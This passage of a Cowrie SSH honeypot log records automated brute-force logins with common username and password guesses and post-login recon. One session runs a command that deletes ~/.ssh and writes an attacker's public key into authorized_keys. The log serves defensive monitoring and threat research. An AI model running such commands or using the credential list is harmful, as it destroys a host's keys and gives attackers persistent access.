a-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:30.486208Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:13:30.906414Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:13:31.117937Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:13:31.118696Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:31.195788Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:31.196935Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e23ca6c18a","protocol":"ssh","message":"New connection: 212.227.235.229:54070 (1.2.3.4:22) [session: b3e23ca6c18a]","sensor":"my-vps","timestamp":"2025-08-31T01:13:33.064251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:34.105543Z","src_ip":"212.227.235.229","session":"b3e23ca6c18a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:13:34.106094Z","src_ip":"212.227.235.229","session":"b3e23ca6c18a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50098,"dst_ip":"1.2.3.4","dst_port":22,"session":"52b161ae33e1","protocol":"ssh","message":"New connection: 212.227.125.160:50098 (1.2.3.4:22) [session: 52b161ae33e1]","sensor":"my-vps","timestamp":"2025-08-31T01:13:40.842700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:40.843367Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:40.918708Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456789","message":"login attempt [dev/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:13:41.042005Z","src_ip":"212.227.235.229","session":"b3e23ca6c18a"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:13:41.176381Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:13:41.533923Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:13:41.534878Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:41.611017Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:41.612107Z","src_ip":"212.227.125.160","session":"52b161ae33e1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:43.112683Z","src_ip":"212.227.235.229","session":"b3e23ca6c18a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49182,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc37db804419","protocol":"ssh","message":"New connection: 212.227.125.160:49182 (1.2.3.4:22) [session: bc37db804419]","sensor":"my-vps","timestamp":"2025-08-31T01:13:51.290804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:51.291726Z","src_ip":"212.227.125.160","session":"bc37db804419"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:51.364983Z","src_ip":"212.227.125.160","session":"bc37db804419"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:13:51.620204Z","src_ip":"212.227.125.160","session":"bc37db804419"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:52.745479Z","src_ip":"212.227.125.160","session":"bc37db804419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44966,"dst_ip":"1.2.3.4","dst_port":22,"session":"e01e5ebf4e80","protocol":"ssh","message":"New connection: 212.227.125.160:44966 (1.2.3.4:22) [session: e01e5ebf4e80]","sensor":"my-vps","timestamp":"2025-08-31T01:13:55.697037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:56.134759Z","src_ip":"212.227.125.160","session":"e01e5ebf4e80"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:13:56.136089Z","src_ip":"212.227.125.160","session":"e01e5ebf4e80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46076,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ac0a1b00df6","protocol":"ssh","message":"New connection: 212.227.235.229:46076 (1.2.3.4:22) [session: 8ac0a1b00df6]","sensor":"my-vps","timestamp":"2025-08-31T01:13:58.057445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:13:58.059420Z","src_ip":"212.227.235.229","session":"8ac0a1b00df6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:13:58.300846Z","src_ip":"212.227.235.229","session":"8ac0a1b00df6"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456789","message":"login attempt [dev/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:13:58.592729Z","src_ip":"212.227.125.160","session":"e01e5ebf4e80"}
{"eventid":"cowrie.login.failed","username":"www","password":"password123456789","message":"login attempt [www/password123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:13:59.262632Z","src_ip":"212.227.235.229","session":"8ac0a1b00df6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:00.030885Z","src_ip":"212.227.125.160","session":"e01e5ebf4e80"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:00.503597Z","src_ip":"212.227.235.229","session":"8ac0a1b00df6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58840,"dst_ip":"1.2.3.4","dst_port":22,"session":"544c4def8fb6","protocol":"ssh","message":"New connection: 212.227.125.160:58840 (1.2.3.4:22) [session: 544c4def8fb6]","sensor":"my-vps","timestamp":"2025-08-31T01:14:01.782020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:01.782958Z","src_ip":"212.227.125.160","session":"544c4def8fb6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:01.856101Z","src_ip":"212.227.125.160","session":"544c4def8fb6"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:02.205456Z","src_ip":"212.227.125.160","session":"544c4def8fb6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:03.329894Z","src_ip":"212.227.125.160","session":"544c4def8fb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47582,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a69fd99096","protocol":"ssh","message":"New connection: 212.227.235.229:47582 (1.2.3.4:22) [session: 57a69fd99096]","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.276510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.277438Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.342582Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.login.success","username":"root","password":"DuckyRoBot","message":"login attempt [root/DuckyRoBot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.644109Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:14:04.801484Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.802187Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.803030Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:04.869374Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:14:05.057590Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.058312Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49764,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d7f5d1bf09b","protocol":"ssh","message":"New connection: 102.88.137.80:49764 (1.2.3.4:22) [session: 8d7f5d1bf09b]","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.079489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.080310Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.125834Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.126791Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48048,"dst_ip":"1.2.3.4","dst_port":22,"session":"df2544ff9662","protocol":"ssh","message":"New connection: 212.227.235.229:48048 (1.2.3.4:22) [session: df2544ff9662]","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.193775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.195633Z","src_ip":"212.227.235.229","session":"df2544ff9662"}
